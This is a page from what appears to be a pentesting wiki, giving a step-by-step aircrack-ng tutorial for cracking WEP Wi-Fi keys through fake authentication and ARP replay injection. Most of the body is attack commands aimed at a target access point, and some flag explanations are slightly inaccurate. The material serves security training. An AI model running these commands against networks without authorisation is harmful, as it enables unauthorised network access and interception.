Zero Day Archives
  • What is Zero Day Archives?
  • Contributors
  • Wireless Security
    • Intro to WiFi Pentesting
      • WEP Networks
      • WPS
      • WPA-PSK Networks
      • WPA & WPA2 PSK
      • WPA2 & WPA3 Enterprise Networks
      • WPA2 & WPA3-APLess
  • Reverse Engineering
    • Reverse Engineering
      • Introduction to Software Reverse Engineering
        • Introduction to Capture the Flag (CTF) Competitions
        • What are PE & Elf Binaries
        • Assembly Language for Beginner Reverse Engineers
        • Memory Registers for x86-64 (64-bit) and x86 (32-bit)
        • Reversing Tools: Command-Line Utilities for Binary Analysis
        • Reversing ELF Binaries: Techniques and Tools
      • Disassembly & Debugging
        • GDB for Reverse Engineering
        • RADARE2 for Reverse Engineering
        • GHIDRA for Reverse Engineering
        • IDA Pro for Reverse Engineering
      • Binary Exploitation
        • Buffer Overflows
          • What are Buffer Overflows and Stack Protections?
          • Commonly Exploited C Functions and Their Secure Alternatives
          • Basic Buffer Overflow in x86-64 Using GDB
        • Cryptography
          • Understanding Ciphers and Identifying Common Patterns
          • Teaching XOR Operations in Binary Exploitation
        • Return Oriented Programming (ROP)
          • Practical Guide to Exploring and Identifying Return-Oriented Programming (ROP)
        • Cracking and Patching Binaries
          • Tactics, Tools, and Procedures for Cracking and Patching Binaries
        • Ret2Win Challenges
  • Malware Analysis
    • Malware Analysis
      • Static Analysis
  • Transporting Files to/from Victims
    • Transferring Files to/from High Value Targets
      • Linux
      • Windows
      • CrackMapExec (NetExec)
  • Penetration Testing against GIT Remote Repositories
    • Targeting GIT Repositories
      • Attacking GIT
  • Network Pivoting, Port Forwarding, and Tunneling
    • Pivoting
      • Ligolo-ng
        • Basic Pivoting
        • Setup Reverse Shells through Pivot
        • Transferring Files through Pivot
      • Pivoting: Using Remote Desktop
      • ProxyChains
      • Metasploit
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Dynamic Port Forwarding
      • Sshuttle over SSH
    • Port Fowarding
      • Chisel Port Forwarding
      • NetSH for Port Forwarding
      • Plink for Port Forwarding
      • SoCat
      • Metasploit: Port Forwarding
  • Anti-Virus Evasion
    • Anti-Virus Evasion
      • Evasion with Metasploit
      • Evasion wtih Shellter
      • Evasion with Virus Total
  • Public Exploit Research
    • Online Exploit Research & Methods
  • Password Attacks
    • Password Attacks
      • Identifying Hashes
        • Hash Identifier Tools
      • John The Ripper
        • Cracking Passwords with John
        • Convert to Hashes with John
        • NTLM vs NTLMv2 Hashes + CrackMapExec
      • Hashcat
        • Cracking Passwords with Hashcat
      • Hydra
        • Hydra for Network Services
        • Hydra for Web Services
      • Mutating Wordlists for John & Hashcat
        • Mutating Wordlists
  • Digital Forensics & Incident Response (DFIR)
    • Digital Forensics
  • Data Science
    • Data Science/AI
  • Software Defined Radio (SDR)
    • Software Defined Radio
  • Embedded Systems Programming
    • Field Programmable Gate Arrays (FPGAs)
  • Other Resources
    • Resources for Hackers
Powered by GitBook
On this page
  • Cracking WEP Keys Using a Fake Authentication and Traffic Generation
  • Prerequisites
  • Step-by-Step Process
  • Connecting to the Wireless Network:
  1. Wireless Security
  2. Intro to WiFi Pentesting

WEP Networks

Cracking WEP Keys Using a Fake Authentication and Traffic Generation

In this tutorial, we'll demonstrate how to crack WEP keys by injecting fake authentication requests and generating traffic to collect enough IVs (Initialization Vectors) for cracking the WEP key.

Prerequisites

Ensure you have the following:

  • A wireless card that supports monitor mode.

  • The necessary tools: airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.

  • A wordlist (e.g., /usr/share/wordlists/rockyou.txt).

Step-by-Step Process

1. Start Interface in Monitor Mode and Kill Unwanted Services

Start by disabling any interfering services, then put your wireless interface into monitor mode:

airmon-ng check kill && airmon-ng start wlan0

2. Scan for Networks

Next, scan for nearby wireless networks to identify the one you want to target:

sudo airodump-ng wlan0mon

This command will show a list of available networks, including their BSSID (MAC address) and channel.

3. Run Airodump on Specific Access Point

Once you've identified the target AP, run airodump-ng on the specific network to capture data:

sudo airodump-ng -bssid <BSSID> -c <Channel> -w <output_file> wlan0mon

  • <BSSID>: The MAC address of the target AP.

  • <Channel>: The channel number on which the AP is operating.

  • <output_file>: The name of the file to save the captured data (e.g., capture.cap).

4. Create Fake Authentication Requests

In order to associate with the target AP and start generating traffic, use aireplay-ng to send fake authentication requests:

sudo aireplay-ng -1 3600 -q 10 -a <BSSID> wlan0mon

  • -1 3600: Sends a fake authentication request every 3600 seconds (1 hour).

  • -q 10: Sets the packet sending interval to 10.

  • -a <BSSID>: The BSSID of the target AP.

5. Generate Traffic for IVs

Next, you need to generate traffic to collect enough IVs for cracking the WEP key. This is done by injecting traffic using aireplay-ng:

sudo aireplay-ng -3 -b <BSSID> -h <Client MAC> wlan0mon

  • -3: The option to generate traffic (ARP requests).

  • -b <BSSID>: The BSSID of the target AP.

  • -h <Client MAC>: The MAC address of a client device connected to the AP.

6. Crack the WEP Key

Once you've captured enough IVs, use aircrack-ng to crack the WEP key:

sudo aircrack-ng <output_file>.cap

<output_file>.cap: The capture file containing the IVs.

Connecting to the Wireless Network:

Connecting:

wpa_supplicant -c <filename>.conf

Then open another terminal and request ip from the DHCP server:

sudo dhclient wlan0 -v

7. Conclusion

After following these steps, you should have cracked the WEP key for the target AP. This method works by injecting fake authentication requests, generating traffic to collect IVs, and then using those IVs to break the encryption.

Note: WEP is an outdated and insecure protocol. It is highly recommended to use WPA2 or WPA3 encryption for better security.

PreviousIntro to WiFi PentestingNextWPS

Last updated 19 days ago